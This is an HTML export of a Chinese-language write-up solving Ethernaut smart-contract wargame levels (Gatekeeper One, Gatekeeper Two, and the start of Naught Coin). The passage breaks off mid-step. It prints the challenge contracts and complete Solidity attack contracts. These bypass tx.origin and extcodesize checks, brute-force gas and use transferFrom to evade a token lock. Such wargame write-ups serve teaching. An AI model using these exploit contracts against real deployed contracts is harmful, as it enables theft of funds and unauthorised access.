<!DOCTYPE html><html><head>
      <title>ehernaut03</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.3\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="ethernaut%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%9513-19">Ethernaut&#x9776;&#x573A;&#x5237;&#x9898;&#x8BB0;&#x5F55;(13-19)</h1>

<pre class="language-text">author: &#x7518;&#x8D5E;&#x6829;
</pre>
<h2 class="mume-header" id="13-gatekeeper-one">13 Gatekeeper One</h2>

<p>&#x8FD9;&#x5173;&#x4E3B;&#x8981;&#x662F;&#x8003;&#x67E5;&#x5BF9;solidity&#x5408;&#x7EA6;&#x57FA;&#x7840;&#x77E5;&#x8BC6;&#x7684;&#x4E86;&#x89E3;&#x3002;<br>
&#x5148;&#x770B;&#x4EE3;&#x7801;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import &apos;@openzeppelin/contracts/math/SafeMath.sol&apos;;

contract GatekeeperOne {

  using SafeMath for uint256;
  address public entrant;

  modifier gateOne() {
    require(msg.sender != tx.origin);
    _;
  }

  modifier gateTwo() {
    require(gasleft().mod(8191) == 0);
    _;
  }

  modifier gateThree(bytes8 _gateKey) {
      require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)), &quot;GatekeeperOne: invalid gateThree part one&quot;);
      require(uint32(uint64(_gateKey)) != uint64(_gateKey), &quot;GatekeeperOne: invalid gateThree part two&quot;);
      require(uint32(uint64(_gateKey)) == uint16(tx.origin), &quot;GatekeeperOne: invalid gateThree part three&quot;);
    _;
  }

  function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
    entrant = tx.origin;
    return true;
  }
}
</code></pre><p>&#x9898;&#x76EE;&#x60F3;&#x8981;&#x6211;&#x4EEC;&#x6267;&#x884C;enter&#x65B9;&#x6CD5;&#xFF0C;&#x5E76;&#x4E14;&#x8981;&#x901A;&#x8FC7;&#x4E09;&#x4E2A;&#x4FEE;&#x9970;&#x5668;&#x7684;&#x68C0;&#x67E5;&#x3002;<br><br>
&#x6211;&#x4EEC;&#x628A;&#x4E09;&#x4E2A;&#x4FEE;&#x9970;&#x5668;&#x5206;&#x5F00;&#x6765;&#x5206;&#x6790;&#xFF1A;</p>
<ul>
<li>
<p>require(msg.sender != tx.origin);<br>
&#x8FD9;&#x4E2A;&#x6761;&#x4EF6;&#x6211;&#x4EEC;&#x518D;&#x4E4B;&#x524D;&#x505A;&#x9898;&#x7684;&#x65F6;&#x5019;&#x9047;&#x5230;&#x8FC7;&#xFF0C;&#x53EA;&#x9700;&#x8981;&#x518D;&#x8C03;&#x7528;&#x51FD;&#x6570;&#x65F6;&#x589E;&#x52A0;&#x4E00;&#x4E2A;&#x4E2D;&#x95F4;&#x51FD;&#x6570;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x4F7F;<code>msg.sender != tx.origin</code></p>
</li>
<li>
<p>require(gasleft().mod(8191) == 0);&#x8FD9;&#x4E2A;&#x6761;&#x4EF6;&#x4F1A;&#x6BD4;&#x8F83;&#x9EBB;&#x70E6;&#x4E00;&#x70B9;&#xFF0C;gasleft&#x51FD;&#x6570;&#x8FD4;&#x56DE;&#x7684;&#x662F;&#x4EA4;&#x6613;&#x5269;&#x4F59;&#x7684;gas&#x91CF;&#xFF0C;&#x6240;&#x4EE5;&#x6211;&#x4EEC;&#x53EA;&#x8981;&#x8BA9;gas&#x4E3A;8191*n+x&#x5373;&#x53EF;&#xFF0C;&#x5176;&#x4E2D;x&#x4E3A;&#x6211;&#x4EEC;&#x6B64;&#x6B21;&#x4EA4;&#x6613;&#x6240;&#x6D88;&#x8017;&#x7684;gas&#x3002;&#x7406;&#x8BBA;&#x4E0A;&#x6765;&#x8BB2;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;debug&#x5F97;&#x5230;&#xFF0C;&#x4F46;&#x662F;&#x7531;&#x4E8E;&#x4E0D;&#x77E5;&#x9053;&#x76EE;&#x6807;&#x5408;&#x7EA6;&#x7684;&#x7F16;&#x8BD1;&#x5668;&#x7248;&#x672C;&#xFF0C;&#x6240;&#x4EE5;&#x65E0;&#x6CD5;&#x7CBE;&#x51C6;&#x5F97;&#x5230;&#x8FD9;&#x4E2A;&#x503C;&#x3002;&#x4F46;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;gas&#x7206;&#x7834;&#x6765;&#x89E3;&#x51B3;&#x3002;&#x6BD5;&#x7ADF;gas&#x6BD5;&#x7ADF;&#x662F;&#x5728;&#x4E00;&#x4E2A;&#x8303;&#x56F4;&#x533A;&#x95F4;&#x4E4B;&#x4E2D;&#x7684;&#x3002;</p>
</li>
<li>
<p>require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)));<br>
require(uint32(uint64(_gateKey)) != uint64(_gateKey));<br>
require(uint32(uint64(_gateKey)) == uint16(tx.origin));<br>
&#x8FD9;&#x4E2A;&#x6761;&#x4EF6;&#x8981;&#x6C42;&#x6211;&#x4EEC;&#x5148;&#x4E86;&#x89E3;solidity&#x4E2D;&#x7C7B;&#x578B;&#x8F6C;&#x6362;&#x7684;&#x89C4;&#x5219;<a href="https://www.tutorialspoint.com/solidity/solidity_conversions.htm#:~:text=Solidity%20compiler%20allows%20implicit%20conversion,value%20not%20allowed%20in%20uint256.">&#x53C2;&#x8003;&#x94FE;&#x63A5;</a><br><br>
&#x8FD9;&#x91CC;&#x4EE5;_gateKey&#x662F;0x12345678deadbeef&#x4E3A;&#x4F8B;&#x8BF4;&#x660E;</p>
<blockquote>
<ol>
<li>uint32(uint64(_gateKey))&#x8F6C;&#x6362;&#x540E;&#x4F1A;&#x53D6;&#x4F4E;&#x4F4D;&#xFF0C;&#x6240;&#x4EE5;&#x53D8;&#x6210;0xdeadbeef&#xFF0C;uint16(uint64(_gateKey))&#x540C;&#x7406;&#x4F1A;&#x53D8;&#x6210;0xbeef&#xFF0C;uint16&#x548C;uint32&#x5728;&#x6BD4;&#x8F83;&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x8F83;&#x5C0F;&#x7684;&#x7C7B;&#x578B;uint16&#x4F1A;&#x5728;&#x5DE6;&#x8FB9;&#x586B;&#x5145;0&#xFF0C;&#x4E5F;&#x5C31;&#x662F;&#x4F1A;&#x53D8;&#x6210;0x0000beef&#x548C;0xdeadbeef&#x505A;&#x6BD4;&#x8F83;&#xFF0C;&#x56E0;&#x6B64;&#x60F3;&#x901A;&#x8FC7;&#x7B2C;&#x4E00;&#x4E2A;require&#x53EA;&#x9700;&#x8981;&#x627E;&#x4E00;&#x4E2A;&#x5F62;&#x4E3A;0x????????0000????&#x8FD9;&#x79CD;&#x5F62;&#x5F0F;&#x7684;&#x503C;&#x5373;&#x53EF;&#xFF0C;&#x5176;&#x4E2D;?&#x662F;&#x4EFB;&#x53D6;&#x503C;&#x3002;</li>
<li>&#x7B2C;&#x4E8C;&#x6B65;&#x8981;&#x6C42;&#x53CC;&#x65B9;&#x4E0D;&#x76F8;&#x7B49;&#xFF0C;&#x53EA;&#x9700;&#x9AD8;4&#x4E2A;&#x5B57;&#x8282;&#x4E2D;&#x4EFB;&#x6709;&#x4E00;&#x4E2A;bit&#x4E0D;&#x4E3A;0&#x5373;&#x53EF;</li>
<li>&#x901A;&#x8FC7;&#x524D;&#x9762;&#x53EF;&#x77E5;&#xFF0C;uint32(uint64(_gateKey))&#x5E94;&#x8BE5;&#x662F;&#x7C7B;&#x4F3C;0x0000beef&#x8FD9;&#x79CD;&#x5F62;&#x5F0F;&#xFF0C;&#x6240;&#x4EE5;&#x53EA;&#x9700;&#x8981;&#x8BA9;&#x6700;&#x4F4E;&#x7684;2&#x4E2A;byte&#x548C;tx.origin&#x5730;&#x5740;&#x6700;&#x4F4E;&#x7684;2&#x4E2A;byte&#x76F8;&#x540C;&#x5373;&#x53EF;&#xFF0C;&#x4E5F;&#x5C31;&#x662F;&#xFF0C;key&#x7684;&#x6700;&#x4F4E;2&#x4E2A;&#x5B57;&#x8282;&#x8BBE;&#x7F6E;&#x4E3A;&#x5408;&#x7EA6;&#x5730;&#x5740;&#x7684;&#x4F4E;2&#x4E2A;&#x5B57;&#x8282;&#x3002;&#x8FD9;&#x91CC;tx.origin&#x5C31;&#x662F;metamask&#x7684;&#x8D26;&#x6237;&#x5730;&#x5740;</li>
</ol>
</blockquote>
<p>&#x653B;&#x51FB;&#x5408;&#x7EA6;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface GatekeeperOne {
    function entrant() external returns (address);
    function enter(bytes8 _gateKey) external returns (bool);
}

contract attack {
    GatekeeperOne gatekeeperOne;
    address target;
    address entrant;

    event log(bool);
    event logaddr(address);

    constructor(address _addr) public {
        // &#x8BBE;&#x7F6E;&#x4E3A;&#x9898;&#x76EE;&#x5730;&#x5740;
        target = _addr;
    }

    function exploit() public {
        // &#x540E;&#x56DB;&#x4F4D;&#x662F;metamask&#x4E0A;&#x8D26;&#x6237;&#x5730;&#x5740;&#x7684;&#x4F4E;2&#x4E2A;&#x5B57;&#x8282;
        bytes8 key=0xAAAAAAAA0000Ff67;
        bool result;
        for (uint256 i = 0; i &lt; 120; i++) {//gas&#x7206;&#x7834;
            (bool result, bytes memory data) = address(target).call{gas:i + 150 + 8191 * 3}(abi.encodeWithSignature(&quot;enter(bytes8)&quot;,key));
            if (result) {
                break;
            }
        }
        emit log(result);
    }

    function getentrant() public {
        gatekeeperOne = GatekeeperOne(target);
        entrant = gatekeeperOne.entrant();
        emit logaddr(entrant);
    }
}
</code></pre></li>
<li>
<p>&#x89E3;&#x9898;&#x6B65;&#x9AA4;<br>
&#x6267;&#x884C;exploit&#x65B9;&#x6CD5;&#x540E;&#x6267;&#x884C;getentrant,&#x53EF;&#x4EE5;&#x5728;&#x4EA4;&#x6613;&#x8BE6;&#x7EC6;&#x4E2D;&#x770B;&#x5230;&#x63D0;&#x4EA4;&#x4E0A;&#x6765;&#x7684;&#x4E8B;&#x52A1;&#x4E2D;address&#x5DF2;&#x7ECF;&#x4E3A;&#x6211;&#x4EEC;&#x7684;&#x5730;&#x5740;&#x3002;&#x901A;&#x5173;</p>
</li>
</ul>
<h2 class="mume-header" id="gatekeeper-two">Gatekeeper Two</h2>

<p>&#x5728;&#x505A;&#x4E86;&#x7B2C;&#x4E00;&#x9053;&#x5B88;&#x95E8;&#x4EBA;&#x540E;&#xFF0C;&#x8FD9;&#x9053;&#x9898;&#x76EE;&#x770B;&#x8D77;&#x6765;&#x5C31;easy&#x5F88;&#x591A;&#x4E86;<br>
&#x5148;&#x770B;&#x4EE3;&#x7801;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract GatekeeperTwo {

  address public entrant;

  modifier gateOne() {
    require(msg.sender != tx.origin);
    _;
  }

  modifier gateTwo() {
    uint x;
    assembly { x := extcodesize(caller()) }
    require(x == 0);
    _;
  }

  modifier gateThree(bytes8 _gateKey) {
    require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1);
    _;
  }

  function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
    entrant = tx.origin;
    return true;
  }
}
</code></pre><p>&#x4E00;&#x6837;&#x7684;&#x6709;&#x4E09;&#x4E2A;&#x51FD;&#x6570;&#x4FEE;&#x9970;&#x5668;&#x9700;&#x8981;&#x6EE1;&#x8DB3;&#xFF0C;&#x6211;&#x4EEC;&#x4F9D;&#x65E7;&#x5206;&#x5F00;&#x6765;&#x8BF4;</p>
<ul>
<li>
<p><strong>require(msg.sender != tx.origin);</strong><br>
&#x8FD9;&#x4E2A;&#x548C;&#x4E0A;&#x4E00;&#x4E2A;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x6761;&#x4EF6;&#x4E00;&#x6837;&#xFF0C;&#x4E0D;&#x518D;&#x8D58;&#x8FF0;&#xFF0C;&#x5EFA;&#x4E00;&#x4E2A;&#x5408;&#x7EA6;&#x5C31;&#x884C;&#x3002;</p>
</li>
<li>
<p><strong>uint x</strong><br>
<strong>assembly { x := extcodesize(caller()) }</strong><br>
<strong>require(x == 0);</strong><br>
&#x8FD9;&#x91CC;&#x6D89;&#x53CA;&#x5230;&#x4E86;solidity&#x4E2D;&#x7684;&#x6C47;&#x7F16;&#x8BED;&#x8A00;&#xFF0C;<a href="https://solidity-cn.readthedocs.io/zh/develop/assembly.html#">&#x53C2;&#x8003;&#x6587;&#x6863;</a>&#xFF0C;&#x5728;&#x8FD9;&#x91CC;<code>caller</code>&#x662F;&#x8C03;&#x7528;&#x7684;&#x53D1;&#x8D77;&#x8005;&#xFF0C;<code>extcodesize(a)</code>&#x4F1A;&#x8FD4;&#x56DE;&#x5730;&#x5740; a &#x7684;&#x4EE3;&#x7801;&#x5927;&#x5C0F;&#x3002;<br>
&#x5173;&#x4E8E;&#x8FD9;&#x70B9;&#xFF0C;&#x9700;&#x8981;&#x4F7F;&#x7528;&#x4E00;&#x4E2A;&#x7279;&#x6027;&#x7ED5;&#x8FC7;&#xFF1A;&#x5F53;&#x5408;&#x7EA6;&#x6B63;&#x5728;&#x6267;&#x884C;&#x6784;&#x9020;&#x51FD;&#x6570;constructor&#x5E76;&#x90E8;&#x7F72;&#x65F6;&#xFF0C;&#x5176;extcodesize&#x4E3A;0&#x3002;&#x6362;&#x53E5;&#x8BDD;&#x8BF4;&#xFF0C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x5728;constructor&#x4E2D;&#x8C03;&#x7528;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x7684;&#x8BDD;&#xFF0C;&#x90A3;&#x4E48;extcodesize(caller())&#x8FD4;&#x56DE;0&#xFF0C;&#x56E0;&#x6B64;&#x53EF;&#x4EE5;&#x7ED5;&#x8FC7;&#x68C0;&#x67E5;&#x3002;</p>
</li>
<li>
<p><strong>require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1);</strong><br>
&#x8FD9;&#x4E2A;&#x6761;&#x4EF6;&#x5176;&#x5B9E;&#x5C31;&#x662F;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;&#x5F02;&#x6216;&#xFF0C;&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x53CD;&#x8FC7;&#x6765;&#x5F02;&#x6216;&#x4E00;&#x6B21;&#x7B97;&#x51FA;&#x6765;&#x7684;&#x7ED3;&#x679C;&#x5C31;&#x662F;key<br></p>
</li>
</ul>
<p>&#x653B;&#x51FB;&#x5408;&#x7EA6;:</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.6.0;

contract attack{
    address target;
    constructor(address _adr) public{
        target = _adr;
        bytes8 password = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^  uint64(0) - 1);
        target.call(abi.encodeWithSignature(&quot;enter(bytes8)&quot;,password));
    }
    
}
</code></pre><h2 class="mume-header" id="15-naught-coin">15 Naught Coin</h2>

<p>&#x8FD9;&#x5173;&#x8003;&#x67E5;&#x5BF9;ERC20&#x7684;&#x4E86;&#x89E3;<br>
&#x5148;&#x770B;&#x4EE3;&#x7801;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import &quot;https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.2.0/contracts/token/ERC20/ERC20.sol&quot;;

 contract NaughtCoin is ERC20 {

  // string public constant name = &apos;NaughtCoin&apos;;
  // string public constant symbol = &apos;0x0&apos;;
  // uint public constant decimals = 18;
  uint public timeLock = now + 10 * 365 days;
  uint256 public INITIAL_SUPPLY;
  address public player;

  constructor(address _player) ERC20(&apos;NaughtCoin&apos;, &apos;0x0&apos;) public {
    player = _player;
    INITIAL_SUPPLY = 1000000 * (10**uint256(decimals()));
    // _totalSupply = INITIAL_SUPPLY;
    // _balances[player] = INITIAL_SUPPLY;
    _mint(player, INITIAL_SUPPLY);
    emit Transfer(address(0), player, INITIAL_SUPPLY);
  }
  
  function transfer(address _to, uint256 _value) override public lockTokens returns(bool) {
    super.transfer(_to, _value);
  }

  // Prevent the initial owner from transferring tokens until the timelock has passed
  modifier lockTokens() {
    if (msg.sender == player) {
      require(now &gt; timeLock);
      _;
    } else {
     _;
    }
  } 
} 
</code></pre><p>&#x5149;&#x770B;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x4FEE;&#x9970;&#x5668;&#x662F;&#x6CA1;&#x6709;&#x6F0F;&#x6D1E;&#x53EF;&#x8A00;&#x7684;&#xFF0C;&#x4F46;&#x95EE;&#x9898;&#x662F;&#xFF0C;ERC20&#x6709;&#x4E24;&#x4E2A;&#x8F6C;&#x8D26;&#x51FD;&#x6570;&#xFF0C;&#x9898;&#x76EE;&#x4E2D;&#x53EA;&#x5BF9;<code>transfer</code>&#x8FD9;&#x4E00;&#x4E2A;&#x51FD;&#x6570;&#x505A;&#x4E86;&#x4FEE;&#x9970;&#xFF0C;&#x4E5F;&#x5C31;&#x662F;&#x8BF4;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x53E6;&#x4E00;&#x4E2A;&#x51FD;&#x6570;&#x8FDB;&#x884C;&#x8F6C;&#x8D26;-<code>transferFrom</code></p>
<ul>
<li>&#x89E3;&#x9898;&#x6B65;&#x9AA4;<br>
&#x76F4;&#x63A5;&#x5728;&#x63A7;&#x5236;&#x53F0;&#x64CD;&#x4F5C;&#x5373;&#x53EF;&#xFF0C;&#x4F46;&#x8981;&#x6CE8;&#x610F;&#xFF0C;&#x5728;&#x8F6C;&#x8D26;&#x64CD;&#x4F5C;&#x4E4B;&#x524D;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x5148;approve<br>
val=&apos;1000000000000000000000000&apos;<br>
